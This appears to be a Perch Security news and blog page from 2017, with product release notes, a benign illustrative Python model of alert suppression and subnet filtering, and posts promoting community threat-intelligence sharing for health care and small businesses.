  • Migration to ElasticSearch 5
Relational DB hardware upgrade and addition of read replica
We’re making strong progress toward Perchy-bana, internal POC and development is promising

Perch partnership program produces practical problem-solving – not panacea – for health care info security challenges

on June 28, 2017

National Health Care Information Sharing and Analysis Community (NH-ISAC) has rolled out an offer for their members that incorporates Perch’s “extremely affordable and simple way to detect and mitigate against threats.”
Release Notes

June 2, 2017

Public Backtest API
  • Manage API token and credentials in Perch
  • Get token, backtest observables, profit!
(Soon) Additional suppression scopes:
  • Global: the Perch SOC will be able to suppress false positives for every group in a single action; we’ll be able to clean up the noisy, false positive intel more quickly so that the gems with real value can shine through.
  • Community: community leaders will be able to groom their own intel from within Perch; a community that preens together, stays together, right?
  • Individual Host: have a single host that you know triggers a FP, but you don’t want to completely ignore the indicator for other hosts? Now you can suppress an event for just one of them.
Sensor Health Summary:
  • Consolidated view of all of your group’s sensors and their health
  • Warnings for low resources and abnormal conditions:
    • Old rules and low rule counts
    • Sensor not uploading data
  • Found in the Admin menu under Sensor Summary
Emerging Threats (and Pro) selectable feeds
Unmonitored network filtering at the sensor
  • Perch takes the list of unmonitored network subnets for your group and sends it to the sensor so that it knows to ignore those networks in its detections.
  • Results in less work for the sensor, allowing us to do more with the hardware; less data sent to Perch, less outgoing network traffic for you, and less to process and store for us! It’s a genuine win-win paradigm-shifting value add, look at all this synergy! Give Canute and Chris a raise, this is amazing!
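As an added illustration of how the suppression scopes and the sensor-side unmonitored-subnet filter described in these notes fit together (example code, not Perch's own), here is a small Python model; the Alert and Suppression shapes, the rule order, and the sample subnet, communities and indicators are all constructed assumptions.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

@dataclass
class Alert:
    indicator: str   # what the sensor matched (domain, IP, hash ...)
    src_ip: str      # host on the monitored network that triggered it
    community: str   # sharing community the alerting group belongs to

@dataclass
class Suppression:
    indicator: str
    scope: str                       # "global", "community" or "host"
    community: Optional[str] = None  # used when scope == "community"
    host_ip: Optional[str] = None    # used when scope == "host"

def sensor_should_ignore(src_ip: str, unmonitored: List[str]) -> bool:
    # Sensor-side filter: an unmonitored subnet never becomes a detection.
    ip = ip_address(src_ip)
    return any(ip in ip_network(cidr) for cidr in unmonitored)

def suppression_scope(alert: Alert, rules: List[Suppression]) -> Optional[str]:
    # Scope of the first rule covering this alert, or None. A community rule
    # applies only inside that community and a host rule only to that one IP.
    for rule in rules:
        if rule.indicator != alert.indicator:
            continue
        if rule.scope == "global":
            return "global"
        if rule.scope == "community" and rule.community == alert.community:
            return "community"
        if rule.scope == "host" and rule.host_ip == alert.src_ip:
            return "host"
    return None

def triage(alert: Alert, unmonitored: List[str], rules: List[Suppression]) -> str:
    # One alert's fate: "dropped_at_sensor", "suppressed:<scope>" or "escalated".
    if sensor_should_ignore(alert.src_ip, unmonitored):
        return "dropped_at_sensor"
    scope = suppression_scope(alert, rules)
    return f"suppressed:{scope}" if scope else "escalated"

# Constructed sample data (not from Perch): one guest subnet and three FP rules.
UNMONITORED = ["10.99.0.0/16"]
RULES = [
    Suppression("evil.example", "global"),
    Suppression("shared-host.example", "community", community="nh-isac"),
    Suppression("cdn.example", "host", host_ip="10.1.2.3"),
]
```

A host-scoped rule leaves the same indicator live for every other host, and a community rule leaves it live for other communities, which is the behaviour the three scopes above promise.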
Alert filtering now considers subnet names
(Soon) Restart tours: watch them again and again with your friends and family!
Touch ups and polish here and there; retry button added to the end of the signup process when there is an error registering.
User group page no longer shows all of the groups from all of your communities, but only those you are actually a member of.
Perch reaches its 1000th build and Perchy has his first birthday!

Perch detected Grizzly indicators (before it was cool)

on January 25, 2017

Just like always, Perch detected indicators for the infamous Grizzly Steppe minutes after DHS released them. Read about how we were able to defuse any panic or confusion for our users before “the Russians are coming” even hit the news that day.

Check out the full article here.

Other People's Analysts

on January 12, 2017

Over the last 6 years, I have been entrenched in Cyber Security.

Packet capture
Network Forensics
Identity and Access Management
Threat Intelligence
During my nPulse Technologies days (acquired by FireEye), I relearned all the network packet stuff that I had been taught in college. The OSI network layers, VLANs, Q-in-Q… oh boy! Reassembling packets (with Python, no less) was a REALLY fun exercise… it never made it into the product, since there were open source tools that did it better (faster?)… but I did it… then came the challenge of using the reassembled data in an application.

Imagine this now, you’re a cyber analyst. You’ve got some juicy intel from your ISAC (FS-ISAC? NH-ISAC?) … or maybe it’s from your industry buddies that you share intel with. You set up your alerting mechanisms, you set up your SIEM, and you wait.

PING! You get a hit! You now have an IP address that a machine in your network tried to go to. You start your research, do a little OSINT, do some googling… and find out it’s a shared host. Oh well.

False Positive.

You tell your buddies, and that’s it for the day.

Guess what just happened? Your group just got smarter because two of you did some work. The first guy set up the intel, and you validated it as a false positive. Since you both shared within your community, you just got smarter! You leveraged a few members of the community to make you all better!

This is the best scenario we have today. Some communities share data. Not many communities allow for automatic sharing of sightings (did you see that IOC in the wild?). NO communities allow you to share what you did in regards to that IOC. Did you block it in a Firewall? Did you mark it as a False Positive?

There aren’t many tools out there that can help this process. The more we can share, the more we can attribute, and the more we can automatically know what’s going on in the networks of our peers, the safer we’ll all be.

Tackling Expensive and Complicated Information Security

on January 11, 2017

Information Security: It doesn’t have to be so expensive (or complicated!)

The Bad News

For Small/Medium Businesses (SMBs), you can’t approach information security the same way your bigger brothers do. Face it, Capital One has a much larger information security (infosec) budget than the Downtown Credit Union in Powhatan, VA. Small companies don’t have the same staffing models, technology expertise or highly specialized analysts that focus solely on protecting data. Sure, there are free and open source tools, for example, but they still require expertise and time to get them up and running, not to mention tuning, maintaining, updating, etc.!

Here’s another challenge. A good information security practice relies on intelligence about threats, attacks, vulnerabilities, etc. There are open source data sets that can help your SMB know what to look for in network scans, packet matching signatures and queries in your SIEM, but that open source data tends to be stale. Don’t get me wrong, it’s table stakes. You NEED to be on the lookout for what Emerging Threats has, but it’s not sufficient. That data will protect you, but it’s a tiny part of the known bad things out there.

Ok, one more ‘bad news’ comment. There are vendors out there that will sell you cyber threat intelligence (CTI) data. Some aggregate data from intelligence providers; they’re called TIPs, Threat Intelligence Platforms. They provide tools and technologies to help you get known intelligence data. Others research, probe and monitor the internet/private networks looking for ‘things’ that are bad. They’ll either sell you the data or sell it to an aggregation company who will sell it to you. They provide a great service, and deserve to be paid for the work they do, but again, this may be pricey and out of your budget.

The Good News!

There is a new reality out there. There are sharing communities being formed to share this threat intelligence data (ISACs and ISAOs). These groups are focused around specific industries (Health Care, Financial Services, Aviation, etc.) and provide a platform to share more RELEVANT data. This is data that affects your industry, and therefore has a much higher chance of being relevant to your company. Their cyber intelligence data is targeted to their industry and typically much more relevant than the data served from large repositories.

Size doesn’t always matter. With finite resources, both technical and human, it’s nearly impossible for SMBs to look out for all the bad things; and why should they? A bank doesn’t care about a command and control channel for a botnet that is targeting manufacturing equipment.

Sharing communities are becoming the KEY source of threat intelligence data for small to mid-size business. It’s putting the control of the infosec spend back into their hands.

By leveraging shared community data as the primary (but still not only!) source of intelligence, we substantially reduce the cost of a comprehensive cyber intelligence and threat mitigation plan. Once we embrace this new world of industry-specific, relevant cyber intel, we’ll have new ways to connect in a USABLE way. What’s “usable”? In order to reap the benefits of your sharing community memberships, you need readily available tools that:

Don’t require a skilled analyst behind the dashboard 24x7.
Don’t require a SIEM to use them.
Don’t require knowledge of code.
Don’t require more than a basic understanding of CTI (STIX, TAXII) terminology.

Now What

Who’s going to provide a tool like this? Ha! I’m not good at keeping secrets, but I’m working on something that will help bring the promise of a sharing community to reality.
